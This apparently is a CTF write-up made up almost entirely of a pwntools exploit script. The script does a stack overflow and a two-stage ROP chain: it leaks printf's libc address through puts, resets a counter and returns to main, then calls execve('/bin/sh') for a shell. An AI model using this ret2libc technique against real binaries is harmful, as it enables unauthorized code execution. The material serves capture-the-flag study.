Tags: rop leak pwn 

Rating:

```python
...

#===========================================================
# EXPLOIT GOES HERE
#===========================================================
# Arch: amd64-64-little
# RELRO: Partial RELRO
# Stack: No canary found
# NX: NX enabled
# PIE: No PIE (0x400000)

# `start()` is not visible here; presumably it is defined in the elided
# pwntools template prelude ("...") and returns the tube (process or
# remote) that every later send/recv call in this script drives.
io = start()

# shellcode = asm(shellcraft.sh())
# payload = fit({
# 32: 0xdeadbeef,
# 'iaaa': [1, 2, 'Hello', 3]
# }, length=128)
# io.send(payload)
# flag = io.recv(...)
# log.success(flag)

def send_rop(rop):
    """Serialise *rop* into a fit() buffer at offset 72 and send it as one line.

    Everything before offset 72 is fit()'s default filler; presumably 72 is
    the distance from the input buffer to the saved return address, though
    that is not stated on the page. Relies on the module-level tube ``io``.
    """
    overflow = fit({72: rop.chain()})
    io.sendline(overflow)

# Step 1: libc address leak
# First chain: puts(GOT['printf']) prints the resolved printf pointer, then
# gets(&counter) rewrites the global `counter`, then control returns to main
# so the program can be overflowed a second time. The binary is built
# without PIE (see the header above), so the ELF/GOT addresses used here are
# fixed and need no leak of their own.
rop = ROP(elf)
# requires a dev version of pwntools
rop(rdi=elf.got['printf'])
rop.call(elf.symbols['puts'])

# overwrite counter
# Why counter must be reset is not shown on this page; presumably the binary
# limits how many times main may be re-entered.
rop(rdi=elf.symbols['counter'])
rop.call(elf.symbols['gets'])

# Extra `ret` before re-entering main; presumably for stack alignment, but
# the page does not say so.
rop.call(rop.ret)
rop.call(elf.symbols['main'])
print(rop.dump())
send_rop(rop)
# Consumed by the gets() call above: gets() stops at the newline, so the
# single NUL byte (plus gets()'s own terminator) is what lands in counter.
io.sendline(b'\x00') # new counter value

# Parse the leak. puts() prints the pointer's bytes up to the first NUL;
# the script reads 6 of them (the non-zero width of a typical user-space
# pointer) and zero-pads to 8 before unpacking as a little-endian u64.
print(io.recvuntil(b'I hope you find yourself too.\n').decode())
raw_ptr = io.recvn(6)
leak = u64(raw_ptr.ljust(8, b'\x00'))
log.success('Leaked address of printf: 0x%x', leak)
# Rebase the libc ELF on the leaked printf so later symbol lookups and
# gadget searches yield absolute runtime addresses.
libc.address = leak - libc.symbols['printf']
log.success('libc base address: 0x%x', libc.address)

# Step 2: Shell
print(io.recvuntil(b'Who are you? ').decode())

# Second overflow, now with libc rebased: let pwntools assemble
# execve("/bin/sh", 0, 0) from gadgets found in the binary and in libc.
rop = ROP([elf, libc])
rop.execve(next(libc.search(b"/bin/sh\x00")), 0, 0)
print(rop.dump())
send_rop(rop)

io.interactive()

```